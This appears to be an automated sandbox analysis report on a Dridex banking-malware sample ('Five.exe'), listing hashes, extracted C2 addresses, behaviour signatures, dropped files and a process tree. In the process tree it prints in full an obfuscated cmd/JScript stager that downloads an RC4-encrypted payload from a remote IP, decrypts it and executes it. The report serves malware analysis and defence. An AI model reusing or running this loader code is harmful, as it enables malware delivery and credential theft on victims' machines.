Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    10-04-2021 13:48

General

  • Target

    Five.exe

  • Size

    347KB

  • MD5

    9bd60d8672e34193a3bb35a09d3d4dc5

  • SHA1

    8ca91b14d95b896a7afe2430830ed88c2700d0ab

  • SHA256

    610d9028a1aac20684ad5bf0b6c0212016eceb3d6d4563cead3c398aac441c5b

  • SHA512

    a4f32f18f54119e1b1dc1d13e8a9ca11695cd4fe66880ce3ccc27679d66d4e7ed08a74a2ddc0dded0534f2af8d5336e4cfd062d6f9359059d9f9a9a03815cd63

Malware Config

Extracted

Family

dridex

Botnet

10111

C2

131.100.24.231:443

188.165.17.91:8443

185.148.169.10:2303

rc4.plain
rc4.plain

Signatures

  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

  • Dridex Loader 1 IoCs

    Detects Dridex both x86 and x64 loader in memory.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 7 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 30 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Five.exe
    "C:\Users\Admin\AppData\Local\Temp\Five.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1944
    • C:\Users\Admin\AppData\Local\Temp\TDUHNVXCWC\multitimer.exe
      "C:\Users\Admin\AppData\Local\Temp\TDUHNVXCWC\multitimer.exe" 0 30603cc16d3187a8.64379538 0 105
      2⤵
      • Executes dropped EXE
      • Drops file in Windows directory
      • Suspicious use of WriteProcessMemory
      PID:604
      • C:\Users\Admin\AppData\Local\Temp\TDUHNVXCWC\multitimer.exe
        "C:\Users\Admin\AppData\Local\Temp\TDUHNVXCWC\multitimer.exe" 1 105
        3⤵
        • Executes dropped EXE
        PID:1620
    • C:\Users\Admin\AppData\Local\Temp\FOLLX4H3I0\setups.exe
      "C:\Users\Admin\AppData\Local\Temp\FOLLX4H3I0\setups.exe" ll
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1668
      • C:\Users\Admin\AppData\Local\Temp\is-D53TN.tmp\setups.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-D53TN.tmp\setups.tmp" /SL5="$30154,2051888,270336,C:\Users\Admin\AppData\Local\Temp\FOLLX4H3I0\setups.exe" ll
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:396
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" https://catser.inappapiurl.com/redirect/57a764d042bf8/
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:308
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:308 CREDAT:275457 /prefetch:2
            5⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1948
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.26.106/?NDc4NzI5&pQE&oa1n4=xHrQMrLYbRvFFYHfLfjKRqZbNU&s2ht4=zRGUWVxo2bk6rPE5qpZDLGpbf1DBmgqVmAH1m-t_d0erFOfQe5zUGwLQE1n40OVl4V_6qniUXRmhWagZTW-BHZZwlHrJGRQrU42F73nbJCdc9xwxXU7WVX_O4eVVkgvA5Tn637&drYVgONDcwMg==" "2""
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1404
              • C:\Windows\SysWOW64\wscript.exe
                wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.26.106/?NDc4NzI5&pQE&oa1n4=xHrQMrLYbRvFFYHfLfjKRqZbNU&s2ht4=zRGUWVxo2bk6rPE5qpZDLGpbf1DBmgqVmAH1m-t_d0erFOfQe5zUGwLQE1n40OVl4V_6qniUXRmhWagZTW-BHZZwlHrJGRQrU42F73nbJCdc9xwxXU7WVX_O4eVVkgvA5Tn637&drYVgONDcwMg==" "2""
                7⤵
                • Blocklisted process makes network request
                • Suspicious use of WriteProcessMemory
                PID:616
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c 4lzm9.exe
                  8⤵
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:652
                  • C:\Users\Admin\AppData\Local\Temp\4lzm9.exe
                    4lzm9.exe
                    9⤵
                    • Executes dropped EXE
                    PID:1068

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

2
T1112

Install Root Certificate

1
T1130

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    MD5

    61a03d15cf62612f50b74867090dbe79

    SHA1

    15228f34067b4b107e917bebaf17cc7c3c1280a8

    SHA256

    f9e23dc21553daa34c6eb778cd262831e466ce794f4bea48150e8d70d3e6af6d

    SHA512

    5fece89ccbbf994e4f1e3ef89a502f25a72f359d445c034682758d26f01d9f3aa20a43010b9a87f2687da7ba201476922aa46d4906d442d56eb59b2b881259d3

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    MD5

    8d48973265581f2457a1478973496022

    SHA1

    ddb0aa68c4a70f9ad0816499c73d4a0be03c51bf

    SHA256

    40c13ad9b70284abf39aa2d454b0f0ce1b4609754082f7d67ff1b496952d8bc0

    SHA512

    95f8ed614c91fdc9a2b621e00922b1bff4b3c2e5af200ab0db73d239e4d417aeb23ca678afd2354846e85e25e3408a8e4996cff892a18cf6c6aef82c8d036c45

  • C:\Users\Admin\AppData\Local\Temp\3.tMp
    MD5

    60fc00422b399db85f87d41b8328976d

    SHA1

    bb85034acad8025f97e5bb236443debaf8926e4b

    SHA256

    c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690

    SHA512

    16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

  • C:\Users\Admin\AppData\Local\Temp\4lzm9.exe
    MD5

    a7e89c98e140c31ea0faeef1a65f4a89

    SHA1

    f481a992d58ee0c8a48132085f55f9d2e3448c7d

    SHA256

    081b494a1c401ab0940d7a0b1e47bdb845dd3c63107d9c90cba10845c7397edc

    SHA512

    a00450d2a6f8b5e21b2956fbd30c88921922ca94da51e612a7f9f4ce23842a84316b8b9f8bfacde98061e03d5f2e508d907e3e7d35b71d6e18aa6ad0f95823be

  • C:\Users\Admin\AppData\Local\Temp\4lzm9.exe
    MD5

    a7e89c98e140c31ea0faeef1a65f4a89

    SHA1

    f481a992d58ee0c8a48132085f55f9d2e3448c7d

    SHA256

    081b494a1c401ab0940d7a0b1e47bdb845dd3c63107d9c90cba10845c7397edc

    SHA512

    a00450d2a6f8b5e21b2956fbd30c88921922ca94da51e612a7f9f4ce23842a84316b8b9f8bfacde98061e03d5f2e508d907e3e7d35b71d6e18aa6ad0f95823be

  • C:\Users\Admin\AppData\Local\Temp\FOLLX4H3I0\setups.exe
    MD5

    0554b2a90322539504c5d664b5e8796a

    SHA1

    51563605d7eeb788edb15c9b2229588f7595b352

    SHA256

    9588961c0f39a1ef6ddf5d58223309743e871d50c33da08878b48e642ce35240

    SHA512

    c77b25f26cbae6a9b25f9558408166fc9dbe4230443c9778d8e6f194fe0dfafa8379943ce66d27d7791dd3ca6e0ca28e1ab41e16e9679e877eec24e21bc11dc2

  • C:\Users\Admin\AppData\Local\Temp\FOLLX4H3I0\setups.exe
    MD5

    0554b2a90322539504c5d664b5e8796a

    SHA1

    51563605d7eeb788edb15c9b2229588f7595b352

    SHA256

    9588961c0f39a1ef6ddf5d58223309743e871d50c33da08878b48e642ce35240

    SHA512

    c77b25f26cbae6a9b25f9558408166fc9dbe4230443c9778d8e6f194fe0dfafa8379943ce66d27d7791dd3ca6e0ca28e1ab41e16e9679e877eec24e21bc11dc2

  • C:\Users\Admin\AppData\Local\Temp\TDUHNVXCWC\multitimer.exe
    MD5

    2b04b457e7e5074575dddf7e9391c014

    SHA1

    9bba9653bb3685854eb0d0aee4a07ea63d0ab7ac

    SHA256

    0a8ddf7be1e8bcaefd7fca87ee9adc6aabd53dee30c69b726beb0554b1746c6d

    SHA512

    bec0ebc42b46ccfe70ccb14582c5484faf76a6ec823889e58467b4139c4b8dd3e43cad8cbe4b547264b5a55bd438e481524298ee7f4293aa357c2af13b749905

  • C:\Users\Admin\AppData\Local\Temp\TDUHNVXCWC\multitimer.exe
    MD5

    2b04b457e7e5074575dddf7e9391c014

    SHA1

    9bba9653bb3685854eb0d0aee4a07ea63d0ab7ac

    SHA256

    0a8ddf7be1e8bcaefd7fca87ee9adc6aabd53dee30c69b726beb0554b1746c6d

    SHA512

    bec0ebc42b46ccfe70ccb14582c5484faf76a6ec823889e58467b4139c4b8dd3e43cad8cbe4b547264b5a55bd438e481524298ee7f4293aa357c2af13b749905

  • C:\Users\Admin\AppData\Local\Temp\TDUHNVXCWC\multitimer.exe
    MD5

    2b04b457e7e5074575dddf7e9391c014

    SHA1

    9bba9653bb3685854eb0d0aee4a07ea63d0ab7ac

    SHA256

    0a8ddf7be1e8bcaefd7fca87ee9adc6aabd53dee30c69b726beb0554b1746c6d

    SHA512

    bec0ebc42b46ccfe70ccb14582c5484faf76a6ec823889e58467b4139c4b8dd3e43cad8cbe4b547264b5a55bd438e481524298ee7f4293aa357c2af13b749905

  • C:\Users\Admin\AppData\Local\Temp\TDUHNVXCWC\multitimer.exe.config
    MD5

    3f1498c07d8713fe5c315db15a2a2cf3

    SHA1

    ef5f42fd21f6e72bdc74794f2496884d9c40bbfb

    SHA256

    52ca39624f8fd70bc441d055712f115856bc67b37efb860d654e4a8909106dc0

    SHA512

    cb32ce5ef72548d1b0d27f3f254f4b67b23a0b662d0ef7ae12f9e3ef1b0a917b098368b434caf54751c02c0f930e92cffd384f105d8d79ee725df4d97a559a3d

  • C:\Users\Admin\AppData\Local\Temp\is-D53TN.tmp\setups.tmp
    MD5

    62a8ecd6d5d293a7af79056ebd79d2a0

    SHA1

    0d94c2d445dcc27d796cb3ddfaf3edb9aaa6166f

    SHA256

    6da810d0fdfc66018a9fb102989918b04afc231fc935981639c6519caea95827

    SHA512

    871f73efd75319aee572442cd7dd66b407ea1c2737f82d6cbd9454a707a279e953c4050b49e3bb55c7de4a4ced3928ac175d6960154f0c64cc07e286e8e227da

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\V0B6JIJ3.txt
    MD5

    1983d5a3e23a363fc54bb79d652bc5ec

    SHA1

    90386f02fc4b893f9dae206d9214d91898c33701

    SHA256

    2795be6af5ddab12032abfc6abce71faf5b3e5f77a284f957d6f92e620fe0979

    SHA512

    018aa9a4661239cd362fe8276be350f8672cbc578edb7c84b29ba8fe6725c21b0c5e2ce800bc87d4ac5cf446ce93bd665d283bc520be180480739d1e3aa2031a

  • \Users\Admin\AppData\Local\Temp\4lzm9.exe
    MD5

    a7e89c98e140c31ea0faeef1a65f4a89

    SHA1

    f481a992d58ee0c8a48132085f55f9d2e3448c7d

    SHA256

    081b494a1c401ab0940d7a0b1e47bdb845dd3c63107d9c90cba10845c7397edc

    SHA512

    a00450d2a6f8b5e21b2956fbd30c88921922ca94da51e612a7f9f4ce23842a84316b8b9f8bfacde98061e03d5f2e508d907e3e7d35b71d6e18aa6ad0f95823be

  • \Users\Admin\AppData\Local\Temp\4lzm9.exe
    MD5

    a7e89c98e140c31ea0faeef1a65f4a89

    SHA1

    f481a992d58ee0c8a48132085f55f9d2e3448c7d

    SHA256

    081b494a1c401ab0940d7a0b1e47bdb845dd3c63107d9c90cba10845c7397edc

    SHA512

    a00450d2a6f8b5e21b2956fbd30c88921922ca94da51e612a7f9f4ce23842a84316b8b9f8bfacde98061e03d5f2e508d907e3e7d35b71d6e18aa6ad0f95823be

  • \Users\Admin\AppData\Local\Temp\is-D53TN.tmp\setups.tmp
    MD5

    62a8ecd6d5d293a7af79056ebd79d2a0

    SHA1

    0d94c2d445dcc27d796cb3ddfaf3edb9aaa6166f

    SHA256

    6da810d0fdfc66018a9fb102989918b04afc231fc935981639c6519caea95827

    SHA512

    871f73efd75319aee572442cd7dd66b407ea1c2737f82d6cbd9454a707a279e953c4050b49e3bb55c7de4a4ced3928ac175d6960154f0c64cc07e286e8e227da

  • \Users\Admin\AppData\Local\Temp\is-LGK7S.tmp\_isetup\_isdecmp.dll
    MD5

    77d6d961f71a8c558513bed6fd0ad6f1

    SHA1

    122bb9ed6704b72250e4e31b5d5fc2f0476c4b6a

    SHA256

    5da7c8d33d3b7db46277012d92875c0b850c8abf1eb3c8c9c5b9532089a0bcf0

    SHA512

    b0921e2442b4cdec8cc479ba3751a01c0646a4804e2f4a5d5632fa2dbf54cc45d4cccffa4d5b522d42afc2f6a622e07882ed7e663c8462333b082e82503f335a

  • \Users\Admin\AppData\Local\Temp\is-LGK7S.tmp\idp.dll
    MD5

    b37377d34c8262a90ff95a9a92b65ed8

    SHA1

    faeef415bd0bc2a08cf9fe1e987007bf28e7218d

    SHA256

    e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f

    SHA512

    69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

  • \Users\Admin\AppData\Local\Temp\is-LGK7S.tmp\itdownload.dll
    MD5

    d82a429efd885ca0f324dd92afb6b7b8

    SHA1

    86bbdaa15e6fc5c7779ac69c84e53c43c9eb20ea

    SHA256

    b258c4d7d2113dee2168ed7e35568c8e03341e24e3eafc7a22a0d62e32122ef3

    SHA512

    5bf0c3b8fa5db63205a263c4fa5337188173248bef609ba4d03508c50db1fd1e336f3041ce96d78cc97659357a83e6e422f5b079d893a20a683270e05f5438df

  • \Users\Admin\AppData\Local\Temp\is-LGK7S.tmp\psvince.dll
    MD5

    d726d1db6c265703dcd79b29adc63f86

    SHA1

    f471234fa142c8ece647122095f7ff8ea87cf423

    SHA256

    0afdfed86b9e8193d0a74b5752a693604ab7ca7369d75136899ff8b08b8c5692

    SHA512

    8cccbff39939bea7d6fe1066551d65d21185cef68d24913ea43f24b8f4e08a5581a9f662061611b15b5248f5f0d541e98d6f70164aaaad14d0856e76fabbfaa4

  • memory/308-85-0x0000000000000000-mapping.dmp
  • memory/396-81-0x0000000000600000-0x000000000063C000-memory.dmp
    Filesize

    240KB

  • memory/396-84-0x0000000000640000-0x000000000064E000-memory.dmp
    Filesize

    56KB

  • memory/396-86-0x0000000000250000-0x0000000000251000-memory.dmp
    Filesize

    4KB

  • memory/396-75-0x0000000000000000-mapping.dmp
  • memory/604-72-0x0000000002160000-0x0000000002162000-memory.dmp
    Filesize

    8KB

  • memory/604-82-0x000007FEF4970000-0x000007FEF5A06000-memory.dmp
    Filesize

    16.6MB

  • memory/604-63-0x0000000000000000-mapping.dmp
  • memory/616-95-0x0000000000000000-mapping.dmp
  • memory/652-98-0x0000000000000000-mapping.dmp
  • memory/1068-106-0x0000000000400000-0x0000000000463000-memory.dmp
    Filesize

    396KB

  • memory/1068-105-0x00000000002C0000-0x00000000002FC000-memory.dmp
    Filesize

    240KB

  • memory/1068-102-0x0000000000000000-mapping.dmp
  • memory/1404-94-0x0000000000000000-mapping.dmp
  • memory/1620-90-0x0000000000000000-mapping.dmp
  • memory/1620-93-0x000007FEF4970000-0x000007FEF5A06000-memory.dmp
    Filesize

    16.6MB

  • memory/1620-92-0x00000000020B0000-0x00000000020B2000-memory.dmp
    Filesize

    8KB

  • memory/1668-70-0x0000000000400000-0x0000000000449000-memory.dmp
    Filesize

    292KB

  • memory/1668-69-0x0000000075AE1000-0x0000000075AE3000-memory.dmp
    Filesize

    8KB

  • memory/1668-67-0x0000000000000000-mapping.dmp
  • memory/1944-60-0x0000000000B50000-0x0000000000B51000-memory.dmp
    Filesize

    4KB

  • memory/1944-62-0x000000001B2C0000-0x000000001B2C2000-memory.dmp
    Filesize

    8KB

  • memory/1948-87-0x0000000000000000-mapping.dmp
  • memory/1948-89-0x0000000000220000-0x0000000000222000-memory.dmp
    Filesize

    8KB